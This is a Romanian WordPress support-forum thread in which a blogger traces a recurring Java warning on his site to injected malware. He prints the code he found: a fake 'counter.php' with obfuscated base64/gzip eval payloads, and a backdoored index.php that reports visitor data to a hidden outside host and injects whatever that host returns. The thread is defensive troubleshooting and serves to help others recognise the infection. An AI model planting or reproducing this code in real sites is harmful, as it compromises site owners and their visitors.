aplicatie "dubioasa" JAVA

Rezolvat Stefan3v
(@stefan3v)

acum 12 ani, 7 luni

De cand mi-am reactivat plugin-ul JAVA in Firefox am descoperit urmatoarea problema pe blogul personal:
http://oi45.tinypic.com/34oaiaa.jpg
http://oi50.tinypic.com/2ln7m9h.jpg
Conditia sa imi apara respectiul avertisment este sa am un IP nou, daca intru de doua ori cu acelasi IP nu imi mai apare avertismentul.In a doua captura am mutat toate postarile in trash si am sters toate pluginurile de pe server.
Adresa blogului: http://www.electronicstefan.ro/

Vizualizare 10 răspunsuri - 1 la 10 (din 10 în total)

voala
(@voala)

acum 12 ani, 7 luni

Eu am intrat la tine pe site si nu am vazut nici o eroare de la java. Poti sa ne ajuti sa replicam eroarea?

Inițiator fir de discuții Stefan3v
(@stefan3v)

acum 12 ani, 7 luni

trebuie incercat din mozila firefox, in chrome nu zice nimic.
daca in firefox nu este instalat plugin-ul Java o sa apara doar pop-up pentru instalarea Java Runtime Environment.
ce imi apare in IE daca nu am java instalat:
oi49.tinypic.com/e1bzlx.jpg
La urmatoare intrare pe blog nu imi mai apare avertismentul pana nu imi schimb IP-ul!.

voala
(@voala)

acum 12 ani, 7 luni

Ok, am intrat cu firefox si am vazut si eu problema.

Ce ar fi de facut (daca zici ca deja ai incercat cu toate pluginurile dezactivate):
– downlodeaza tot siteul in calculator. Foloseste un search in toate fisiere si cauta acea adresa widgetcolorq9.biz pe care scriptul vrea sa o acceseze. E posibil sa ai niste cod injectat in fisierele din site.

De cand a aparut problema asta? Poti lega vrun eveniment / instalare de noi pluginuri / update-uri pluginuri de el?
Inițiator fir de discuții Stefan3v
(@stefan3v)

acum 12 ani, 7 luni
ce-a mai enervanta treaba e ca acea adresa se tot schimba in fiecare zi.
Am facut un back-ul la toate fisierele de pe server si o sa incerc sa ma uit prin ele, desi nu cred ca o sa gasesc ceva.
Nu pot asocia anomalia cu un eveniment anume, instalasem un countdown si parca de atunci mi-a aparut ceva de java dar nu sunt sigur.
Mai multe persoane mi-au spus ca site-ul emu cintine virusi si cand i-am rugat sa mai verifice au zic ca nu mai primesc avertismentul respectiv.
Partea interesanta este ca eu mai am in clientul de FTP inregistrat un site, pe o cu totul alta platoforma, am observat ca si acolo se intampla acelasi lucru. Pe respectivul site nimic nu are legatura cu wordpress-ul asa ca nu o sa-i dau numele.
La un moment dat am gasit pe serverul meu un fisier „counter.php”, continea niste comentarii ca ar fi fost generat de server si niste variabile total anapota ex: xpagjs1v4dq79……
Am scanat site-ul meu cu toate programele online si degeaba, nu au gasit nimic.
Posibil sa fie ceva injecta si-n baza de date?

p.s: am dat iar de counter.php desi il stersesem:
```
<?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>
```
Inițiator fir de discuții Stefan3v
(@stefan3v)

acum 12 ani, 7 luni
in wp-content am index.php cu urmatoarele linii:
```
<?php
// Silence is golden.
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>
```
am modficat extensia la counter.php si la index.php (sa le scot din „joc”) si am pus index.php original din WP dar problema persista.

p.s: m-am enervat si am sters tot de pe FTP, am backup.
Inițiator fir de discuții Stefan3v
(@stefan3v)

acum 12 ani, 7 luni

la o simpla cautare pe google mi-am dat seama ca problema nu este doar imagineatia mea.
http://www.google.ro/#output=search&sclient=psy-ab&q=%3F%3E%3C%3Fphp+if+%28!isset%28%24sRetry%29%29+{+global+%24sRetry%3B+%24sRetry+%3D+1%3B+++++%2F%2F+This+code+use+for+global+bot+statistic++++&oq=%3F%3E%3C%3Fphp+if+%28!isset%28%24sRetry%29%29+{+global+%24sRetry%3B+%24sRetry+%3D+1%3B+++++%2F%2F+This+code+use+for+global+bot+statistic++++&gs_l=hp.12...485.14209.0.15501.2.2.0.0.0.0.0.0..0.0...0.2...1c.1.7.psy-ab.Oq6inTl44-8&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44158598,d.ZWU&fp=efd6ef96c9ff7b6e&biw=1280&bih=841 (copy/paste in bara de adrese)

voala
(@voala)

acum 12 ani, 7 luni

era vorba de codul din index.php?

Inițiator fir de discuții Stefan3v
(@stefan3v)

acum 12 ani, 7 luni

codul este aici http://ro.forums.wordpress.org/topic/aplicatie-dubioasa-java?replies=7#post-3368 si se afla in mai multe fisiere .php din tot site-ul.
Am ceva de munca sa-l curat si tot nu sunt convins ca nu se mai repeta „isprava” atata timp cat nu identific sursa problemei.

voala
(@voala)

acum 12 ani, 7 luni

Interesant. Bine de stiut pe viitor pentru cei care intalnesc aceasi problema.

Ca sa cureti rapid totul, trage in calculatorul intregul site si foloseste un dreamweaver eventual ca sa cureti toate fisierele odata de acea bucata de cod.

Inițiator fir de discuții Stefan3v
(@stefan3v)

acum 12 ani, 7 luni

am descarcat tot site-ul la mine in calculator si am cautat in toate filele .php, cu notepad++, linia „// This code use for global bot statistic”. Observ ca a dat rezultate dar tot nu stiu provenienta „virusului”. Problema ce ma ingrijoreaza este ca toate site-rile memorate in filezilla au continut acest „virus”.

Vizualizare 10 răspunsuri - 1 la 10 (din 10 în total)

Subiectul „aplicatie "dubioasa" JAVA” este închis pentru răspunsuri noi.

Subiecte

Cele mai populare subiecte

Subiecte fără răspunsuri

Subiecte care nu cer suport

Subiecte rezolvate

Subiecte nerezolvate

Toate subiectele